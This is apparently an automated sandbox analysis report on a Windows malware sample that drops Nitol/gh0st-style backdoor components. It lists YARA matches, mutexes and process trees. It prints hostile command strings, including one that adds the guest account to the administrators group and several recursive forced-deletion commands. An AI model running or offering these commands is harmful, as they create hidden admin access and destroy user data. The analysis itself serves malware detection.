Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10017360	8_2_10017360
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10038360	8_2_10038360
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1001D370	8_2_1001D370
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1003D390	8_2_1003D390
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1001ABA0	8_2_1001ABA0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100393A0	8_2_100393A0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100563A0	8_2_100563A0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1004FBC5	8_2_1004FBC5
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1004B3C0	8_2_1004B3C0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100233F0	8_2_100233F0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1003DBF0	8_2_1003DBF0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100413F0	8_2_100413F0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10053418	8_2_10053418
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1005141B	8_2_1005141B
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10042420	8_2_10042420
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1001543E	8_2_1001543E
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10040C40	8_2_10040C40
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10034C70	8_2_10034C70
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1001C480	8_2_1001C480
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1001ACA0	8_2_1001ACA0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100364B0	8_2_100364B0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1002DCC0	8_2_1002DCC0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10035CC0	8_2_10035CC0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100554E0	8_2_100554E0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100334F0	8_2_100334F0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100544FD	8_2_100544FD
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1003AD00	8_2_1003AD00
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10015D10	8_2_10015D10
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1001CD20	8_2_1001CD20
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10035540	8_2_10035540
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1003FD40	8_2_1003FD40
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10034560	8_2_10034560
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1002C570	8_2_1002C570
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10051DC7	8_2_10051DC7
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1003CDC0	8_2_1003CDC0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100415C0	8_2_100415C0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100145D0	8_2_100145D0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1004A5D0	8_2_1004A5D0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10016DE0	8_2_10016DE0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10039DE0	8_2_10039DE0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1004CDE0	8_2_1004CDE0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100505F7	8_2_100505F7
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10041DF0	8_2_10041DF0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10040E00	8_2_10040E00
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10037E10	8_2_10037E10
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10038610	8_2_10038610
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1001DE40	8_2_1001DE40
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1001D650	8_2_1001D650
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10038E50	8_2_10038E50
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10022E60	8_2_10022E60
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10064E70	8_2_10064E70
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1001568D	8_2_1001568D
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1003B690	8_2_1003B690
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1003C6A0	8_2_1003C6A0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100656D0	8_2_100656D0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10066EE0	8_2_10066EE0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10033EF0	8_2_10033EF0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1003F700	8_2_1003F700
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10057F20	8_2_10057F20
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10013730	8_2_10013730
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10063F30	8_2_10063F30
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10063760	8_2_10063760
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10046F90	8_2_10046F90
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10040FC0	8_2_10040FC0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1001BFD0	8_2_1001BFD0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_1003A7D0	8_2_1003A7D0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_100287F0	8_2_100287F0

Found potential string decryption / allocating functions

Source: C:\Windows\Temp\ .exe	Code function: String function: 00401B10 appears 2588 times
Source: C:\Windows\Temp\ .exe	Code function: String function: 0044991C appears 59 times
Source: C:\Windows\Temp\ .exe	Code function: String function: 00456F8E appears 53 times
Source: C:\Windows\Temp\ .exe	Code function: String function: 00454F3B appears 2661 times
Source: C:\Windows\Temp\ .exe	Code function: String function: 00459697 appears 31 times
Source: C:\Windows\Temp\ .exe	Code function: String function: 004483B0 appears 122 times

Sample file is different than original file name gathered from version info

Source: G3izWAY3Fa.exe, 00000000.00000002.1327850381.000000000297D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSystemTool.exe8 vs G3izWAY3Fa.exe
Source: G3izWAY3Fa.exe, 00000000.00000002.1326968459.0000000000409000.00000004.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSystemTool.exe8 vs G3izWAY3Fa.exe

Uses 32bit PE files

Source: G3izWAY3Fa.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Yara signature match

Source: dump.pcap, type: PCAP	Matched rule: gh0st author = https://github.com/jackcr/
Source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Backdoor_Nitol_Jun17 date = 2017-06-04, hash1 = cba19d228abf31ec8afab7330df3c9da60cd4dae376552b503aea6d7feff9946, author = Florian Roth, description = Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader, reference = https://goo.gl/OOB3mH, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: ZxShell_Related_Malware_CN_Group_Jul17_2 date = 2017-07-08, hash1 = 204273675526649b7243ee48efbb7e2bc05239f7f9015fbc4fb65f0ada64759e, author = Florian Roth, description = Detects a ZxShell related sample from a CN threat group, reference = https://blogs.rsa.com/cat-phishing/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_Mal1 date = 2018-02-08, hash1 = 173d69164a6df5bced94ab7016435c128ccf7156145f5d26ca59652ef5dcd24e, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 2.2.v5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
Source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Backdoor_Nitol_Jun17 date = 2017-06-04, hash1 = cba19d228abf31ec8afab7330df3c9da60cd4dae376552b503aea6d7feff9946, author = Florian Roth, description = Detects malware backdoor Nitol - file wyawou.exe - Attention: this rule also matches on Upatre Downloader, reference = https://goo.gl/OOB3mH, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: ZxShell_Related_Malware_CN_Group_Jul17_2 date = 2017-07-08, hash1 = 204273675526649b7243ee48efbb7e2bc05239f7f9015fbc4fb65f0ada64759e, author = Florian Roth, description = Detects a ZxShell related sample from a CN threat group, reference = https://blogs.rsa.com/cat-phishing/, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: CN_disclosed_20180208_Mal1 date = 2018-02-08, hash1 = 173d69164a6df5bced94ab7016435c128ccf7156145f5d26ca59652ef5dcd24e, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://www.virustotal.com/graph/#/selected/n120z79z208z189/drawer/graph-details, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 4.2.v5.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Nitol_Malware_Jan19_1 date = 2019-01-14, hash1 = fe65f6a79528802cb61effc064476f7b48233fb0f245ddb7de5b7cc8bb45362e, author = Florian Roth, description = Detects Nitol Malware, reference = https://twitter.com/shotgunner101/status/1084602413691166721
Source: 00000003.00000002.2681095838.0000000000650000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: gh0st author = https://github.com/jackcr/
Source: 00000003.00000002.2705358503.0000000002A5D000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY	Matched rule: gh0st author = https://github.com/jackcr/

Source: v5.exe, 00000002.00000002.1330252488.000000000075A000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: u.sLN

Source: classification engine

Classification label: mal84.spre.bank.troj.spyw.evad.winEXE@113/11@12/4

Source: C:\Windows\Temp\server.exe	Code function: 3_2_10011F80 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,	3_2_10011F80
Source: C:\Windows\Temp\ .exe	Code function: 5_2_0043A410 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,InitiateSystemShutdownA,	5_2_0043A410
Source: C:\Windows\Temp\ .exe	Code function: 5_2_0043A500 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,	5_2_0043A500
Source: C:\Windows\Temp\ .exe	Code function: 5_2_0043AD30 MessageBoxA,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,	5_2_0043AD30
Source: C:\Windows\Temp\ .exe	Code function: 5_2_0043ADF0 MessageBoxA,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,	5_2_0043ADF0
Source: C:\Windows\SysWOW64\033726\svchost.exe	Code function: 8_2_10011F80 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,CloseHandle,	8_2_10011F80

Source: C:\Users\user\Desktop\G3izWAY3Fa.exe

Code function: 0_2_004041CD GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

0_2_004041CD

Source: C:\Windows\Temp\server.exe

Code function: 3_2_100018A0 wsprintfA,CreateToolhelp32Snapshot,Process32First,_strcmpi,GetCurrentProcessId,OpenProcess,GetModuleFileNameExA,K32GetModuleFileNameExA,_strcmpi,CloseHandle,Process32Next,CloseHandle,

3_2_100018A0

Source: C:\Users\user\Desktop\G3izWAY3Fa.exe

Code function: 0_2_00402020 CoCreateInstance,MultiByteToWideChar,

0_2_00402020

Source: C:\Windows\Temp\v5.exe

Code function: 2_2_00405244 LoadLibraryA,6D0C6DE0,FindResourceA,LoadResource,LockResource,wsprintfA,WriteFile,WriteFile,SetFilePointer,lstrlen,WriteFile,CloseHandle,

2_2_00405244

Source: C:\Windows\Temp\v5.exe

Code function: 2_2_0040597D WSAStartup,StartServiceCtrlDispatcherA,ExitProcess,

2_2_0040597D

Source: C:\Windows\Temp\v5.exe	Code function: 2_2_0040597D WSAStartup,StartServiceCtrlDispatcherA,ExitProcess,		2_2_0040597D
Source: C:\Windows\Temp\v5.exe	Code function: 4_2_0040597D WSAStartup,StartServiceCtrlDispatcherA,ExitProcess,		4_2_0040597D

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2376:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7008:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6040:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7584:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5420:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7568:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6596:120:WilError_03
Source: C:\Windows\SysWOW64\033726\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\AAAAAA9PT0vfT4rqenp70A/Pqpp6+vr58= BBBBBB9PT0vf4Fr7K0sr0A/Pqpp6+vr58= CCCCCC9PT0vQXpr7K0sr0A/Pqpp6+vr58= GGGGGG4wIF/vL7858= XXXXXX579E5A5B VVVVVVrr2unw==
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2524:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:604:120:WilError_03
Source: C:\Windows\Temp\server.exe	Mutant created: \Sessions\1\BaseNamedObjects\AAAAAArrGvvbOnvbCzvbGwsKmnr6+vnw==
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7780:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3184:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6908:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7604:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7224:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4084:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7508:120:WilError_03
Source: C:\Windows\Temp\v5.exe	Mutant created: \BaseNamedObjects\Defghi Klmnopqr Tuv
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:660:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5756:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2440:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6360:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1044:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3736:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2148:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3060:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3280:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5764:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1272:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5856:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6776:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7232:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1380:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7748:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1816:120:WilError_03

Source: C:\Users\user\Desktop\G3izWAY3Fa.exe

File created: C:\Users\user\AppData\Local\Temp\nswC4F8.tmp

Jump to behavior

Source: G3izWAY3Fa.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\G3izWAY3Fa.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\G3izWAY3Fa.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: G3izWAY3Fa.exe	Virustotal: Detection: 70%
Source: G3izWAY3Fa.exe	ReversingLabs: Detection: 86%

Source: server.exe	String found in binary or memory: cmd.exe /c net user guest /active:yes && net user guest %s && net localgroup administrators guest /add
Source: svchost.exe	String found in binary or memory: cmd.exe /c net user guest /active:yes && net user guest %s && net localgroup administrators guest /add

Source: C:\Users\user\Desktop\G3izWAY3Fa.exe

File read: C:\Users\user\Desktop\G3izWAY3Fa.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\G3izWAY3Fa.exe "C:\Users\user\Desktop\G3izWAY3Fa.exe"
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process created: C:\Windows\Temp\v5.exe "C:\Windows\temp\v5.exe"
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process created: C:\Windows\Temp\server.exe "C:\Windows\temp\server.exe"
Source: unknown	Process created: C:\Windows\Temp\v5.exe C:\Windows\temp\v5.exe
Source: C:\Users\user\Desktop\G3izWAY3Fa.exe	Process created: C:\Windows\Temp\ .exe "C:\Windows\temp\ .exe"
Source: C:\Windows\Temp\v5.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c del C:\Windows\temp\v5.exe > nul
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\server.exe	Process created: C:\Windows\SysWOW64\033726\svchost.exe "C:\Windows\system32\033726\svchost.exe"
Source: C:\Windows\SysWOW64\033726\svchost.exe	Process created: C:\Windows\SysWOW64\034031\svchost.exe "C:\Windows\system32\034031\svchost.exe"
Source: unknown	Process created: C:\Windows\XXXXXX05CA35CC\svchsot.exe "C:\Windows\XXXXXX05CA35CC\svchsot.exe"
Source: unknown	Process created: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe "C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exe"
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\.tmp & del /f /s /q %systemdrive%\._mp & del /f /a /q %systemdrive%*.sqm & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\.bak & del /f /s /q %systemdrive%\.old & del /f /s /q %windir%\softwaredistribution\download\. & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\. & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\. & del /f /q %userprofile%\cookies\. & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\. & del /f /s /q %userprofile%\recent\. & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal. & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\.tmp & del /f /s /q %systemdrive%\._mp & del /f /a /q %systemdrive%*.sqm & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\.bak & del /f /s /q %systemdrive%\.old & del /f /s /q %windir%\softwaredistribution\download\. & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\. & exit
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\. & del /f /q %userprofile%\cookies\. & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\. & del /f /s /q %userprofile%\recent\. & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\$NtUninstal. & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\.tmp & del /f /s /q %systemdrive%\._mp & del /f /a /q %systemdrive%*.sqm & exit
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.gid && exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\*.chk & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %windir%\.bak & del /f /s /q %systemdrive%\.old & del /f /s /q %windir%\softwaredistribution\download\. & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %systemdrive%\recycled\. & exit
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temp\. & del /f /q %userprofile%\cookies\. & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\Temp\ .exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k del /f /s /q %userprofile%\Local Settings\Temporary Internet Files\. & del /f /s /q %userprofile%\recent\. & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
